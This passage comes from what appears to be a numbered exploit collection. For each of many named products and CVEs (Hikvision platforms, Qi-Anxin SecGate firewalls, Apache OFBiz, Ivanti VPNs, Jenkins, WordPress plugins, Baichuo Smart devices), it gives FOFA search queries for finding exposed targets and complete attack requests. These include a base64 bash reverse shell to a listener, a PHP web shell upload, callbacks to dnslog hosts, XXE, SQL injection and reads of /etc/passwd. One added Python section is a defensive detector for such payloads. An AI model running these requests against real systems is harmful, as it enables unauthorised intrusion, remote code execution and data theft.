User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

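Items 62, 75, 79, 82, 86 and 88 inject shell metacharacters (||, backticks, |, a newline sent as %0a, ${IFS}) into a parameter, items 76 and 84 inject FreeMarker directives, item 72 declares an external XML entity, and items 64, 68, 69 and 71 carry WAITFOR DELAY. Most of these arrive percent-encoded, so a signature that runs on the raw access-log line misses them. The following is an added example written for this page, not code from the article or from any vendor: it decodes a query string or body (repeatedly, to catch double encoding), lowercases it and matches a small constructed signature set; the SAMPLES dictionary holds the relevant parts of the requests in this listing, embedded as constructed input (items 76 and 88 abridged). Item 90 is included deliberately: its body jsondata[ip]=ipconfig contains no metacharacter at all, so no signature can tell it from a legitimate ping target, and for that product only the vendor fix or positive validation of ip as an address helps.

```python
from __future__ import annotations

import re
import urllib.parse
from typing import Iterable

# Words that usually follow a shell separator in a command-injection probe (constructed list).
_CMD = r"(?:id|cat|echo|ifconfig|ipconfig|whoami|uname|ls|curl|wget|ping|nc)"

SIGNATURES: list[tuple[str, re.Pattern[str]]] = [
    ("freemarker-ssti", re.compile(
        r"<#assign\b.*?freemarker\.template\.utility\.execute|\?new\(\)", re.S)),
    ("xxe-external-entity", re.compile(r"<!entity\s+(?:%\s*)?\S+\s+(?:system|public)\b")),
    # value = ... <separator> <command>, or ${IFS} anywhere in a value
    ("shell-metachar-in-param", re.compile(r"=[^&]*(?:[|;`\n]\s*" + _CMD + r"\b|\$\{ifs\})")),
    ("mssql-time-delay", re.compile(r"waitfor\s+delay\s+'")),
]


def normalise(raw: str, rounds: int = 2) -> str:
    """Percent-decode (with '+' as space) until the text stops changing or `rounds` is
    reached, then lowercase. One pass handles %0a / %27 / %3C; the second pass handles
    the double-encoded variants that filters are commonly bypassed with."""
    text = raw
    for _ in range(rounds):
        decoded = urllib.parse.unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text.lower()


def classify(request_part: str) -> list[str]:
    """Names of the signatures that match a query string or body, in SIGNATURES order."""
    text = normalise(request_part)
    return [name for name, pattern in SIGNATURES if pattern.search(text)]


def scan_log(lines: Iterable[str]) -> list[tuple[int, list[str]]]:
    """(1-based line number, matched signatures) for every line that matches something."""
    hits = []
    for number, line in enumerate(lines, start=1):
        matched = classify(line)
        if matched:
            hits.append((number, matched))
    return hits


# Constructed sample input: the query strings / bodies of the listed items, plus two extra lines.
SAMPLES = {
    "item62": 'doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt',
    "item72": "S=ajaxColManager&M=colDelLock&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E",
    "item75": "Command=setSyncTimeHost&time=`ifconfig>test28256.txt`",
    "item76": r'{"command": "GetFZinfo", "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo x >./webapps/ROOT/x.txt\")}"}',
    "item79": "path=|id",
    "item84": r'{"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}", "type": "0"}',
    "item86": "host=%0acat${IFS}/etc/passwd%0a&command=ping",
    "item88": "g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a",
    "item90": "jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig",
    "item71": "accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type",
    "double": "page=%257C%257Cid",  # '||id' percent-encoded twice
    "benign": "q=hello+world&page=2",
}

if __name__ == "__main__":
    for label, part in SAMPLES.items():
        print(f"{label:7s} {classify(part)}")
```

Treating '+' as a space is right for query strings and form bodies and harmless for the JSON bodies of items 76 and 84; the one thing the decoder must not do is stop at the first pass, since the double-encoded sample only becomes ||id on the second.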
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
The ..;/ segment is stripped by the servlet container as a path parameter, so the request reaches the download endpoint through the task path; fileName is then used without normalisation.
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision operations management center session command execution
Fastjson deserialization command execution
Hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. Qi-Anxin Wangshen (奇安信网神) SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

Then request the uploaded file:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. QiAnXin Legendsec (奇安信网神) SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
</ds:SignedInfo>
<<ds:SignatureValue>qwerty</ds:SignatureValue>
<ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>
</ds:KeyInfo>
<ds:Object></ds:Object>
</ds:Signature>
</soap:Body>
</soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 of the XML document below:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
  "topicurl":"getSysStatusCfg",
  "token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: (replace with your own token)
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


Response:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


110. GoAnywhere MFT unauthenticated admin user creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. Beijing Baichuo (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. Beijing Baichuo (百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Baichuo (百绰) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


Uploaded file path: /upload/2.php


121. Beijing Baichuo (百绰) Smart S42 management platform: arbitrary file upload via userattestation.php
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
